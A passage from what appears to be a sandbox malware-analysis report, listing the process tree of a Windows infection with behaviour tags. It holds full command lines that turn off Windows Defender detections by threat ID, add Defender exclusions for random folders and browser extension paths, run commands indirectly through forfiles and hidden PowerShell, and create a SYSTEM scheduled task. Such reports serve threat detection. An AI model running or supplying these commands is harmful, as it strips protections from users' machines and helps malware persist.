C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"8⤵
- Indirect Command Execution
PID:4264 -
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True9⤵PID:704
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True10⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1360 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True11⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1856
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bdLMAcyiuofwZlrejw" /SC once /ST 09:10:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS17F8.tmp\Install.exe\" jm /VdidTsYL 385104 /S" /V1 /F8⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:404
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4100 -s 10888⤵
- Program crash
PID:1780
-
-
-
-
-
C:\Users\Admin\Pictures\8NYxJZjsZmkPKrv00HfCzotx.exe"C:\Users\Admin\Pictures\8NYxJZjsZmkPKrv00HfCzotx.exe"5⤵
- Executes dropped EXE
- Checks processor information in registry
PID:3040
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"4⤵PID:1188
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000090001\MYNEWRDX.exe"C:\Users\Admin\AppData\Local\Temp\1000090001\MYNEWRDX.exe"3⤵
- Executes dropped EXE
PID:1428
-
-
-
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exeC:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:1668
-
C:\Users\Admin\AppData\Local\Temp\0ae19c9b3d\Hkbsse.exeC:\Users\Admin\AppData\Local\Temp\0ae19c9b3d\Hkbsse.exe1⤵
- Executes dropped EXE
PID:4812
-
C:\Users\Admin\AppData\Local\Temp\7zS17F8.tmp\Install.exeC:\Users\Admin\AppData\Local\Temp\7zS17F8.tmp\Install.exe jm /VdidTsYL 385104 /S1⤵
- Executes dropped EXE
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:960 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"2⤵PID:3340
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"3⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
PID:2324 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 64⤵
- System Location Discovery: System Language Discovery
PID:3848 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵PID:1844
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"3⤵
- Indirect Command Execution
PID:4600 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 64⤵PID:5116
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵PID:4808
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"3⤵
- Indirect Command Execution
PID:2960 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 64⤵
- System Location Discovery: System Language Discovery
PID:1252 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵PID:4972
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"3⤵
- Indirect Command Execution
PID:3016 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 64⤵
- System Location Discovery: System Language Discovery
PID:2456 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵
- System Location Discovery: System Language Discovery
PID:3180
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
PID:2364 -
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force4⤵
- System Location Discovery: System Language Discovery
PID:1036 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2908 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force6⤵
- System Location Discovery: System Language Discovery
PID:3000
-
-
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD 
\"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4268 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:1544 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:3948
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:1780
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:3412
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:980
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:4468
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:4692
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:2156
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:4752
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:3396
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:2484
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:4804
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:2272
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:1840
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:2068
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:4928
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:2196
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:1060
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:4512
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:1488
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:3176
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:2716
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:2312
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:4980
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:3924
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:3480
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:4812
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵PID:908
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:4440
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OKRdpmURQpaU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OKRdpmURQpaU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZTBxIWbqU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZTBxIWbqU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\aMBHFSbSyrUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\aMBHFSbSyrUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\smKXxMfqpieUC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\smKXxMfqpieUC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\xOBlloqpUQIzwZLwmJR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\xOBlloqpUQIzwZLwmJR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\VyxcWyOuWaibjkVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\VyxcWyOuWaibjkVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\PeYlPniMlKWeAvybP\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\PeYlPniMlKWeAvybP\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\AkGJDxGRiCChDkCg\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\AkGJDxGRiCChDkCg\" /t REG_DWORD /d 0 /reg:64;" 2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2324 -
C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OKRdpmURQpaU2" /t REG_DWORD /d 0 /reg:32 3⤵ PID:3536
-
C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OKRdpmURQpaU2" /t REG_DWORD /d 0 /reg:32 4⤵
- System Location Discovery: System Language Discovery
PID:804
-
-
-
C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OKRdpmURQpaU2" /t REG_DWORD /d 0 /reg:64 3⤵
- System Location Discovery: System Language Discovery
PID:4232
-
-
C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZTBxIWbqU" /t REG_DWORD /d 0 /reg:32 3⤵
- System Location Discovery: System Language Discovery
PID:1264
-
-
C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZTBxIWbqU" /t REG_DWORD /d 0 /reg:64 3⤵
- System Location Discovery: System Language Discovery
PID:3184
-
-
C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\aMBHFSbSyrUn" /t REG_DWORD /d 0 /reg:32 3⤵ PID:4652
-
-
C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\aMBHFSbSyrUn" /t REG_DWORD /d 0 /reg:64 3⤵
- System Location Discovery: System Language Discovery
PID:2572
-
-
C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\smKXxMfqpieUC" /t REG_DWORD /d 0 /reg:32 3⤵ PID:4276
-
-
C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\smKXxMfqpieUC" /t REG_DWORD /d 0 /reg:64 3⤵
- System Location Discovery: System Language Discovery
PID:2976
-
-
C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xOBlloqpUQIzwZLwmJR" /t REG_DWORD /d 0 /reg:32 3⤵
- System Location Discovery: System Language Discovery
PID:1492
-
-
C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xOBlloqpUQIzwZLwmJR" /t REG_DWORD /d 0 /reg:64 3⤵
- System Location Discovery: System Language Discovery
PID:2364
-
-
C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\VyxcWyOuWaibjkVB /t REG_DWORD /d 0 /reg:32 3⤵ PID:568
-
-
C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\VyxcWyOuWaibjkVB /t REG_DWORD /d 0 /reg:64 3⤵
- System Location Discovery: System Language Discovery
PID:2064
-
-
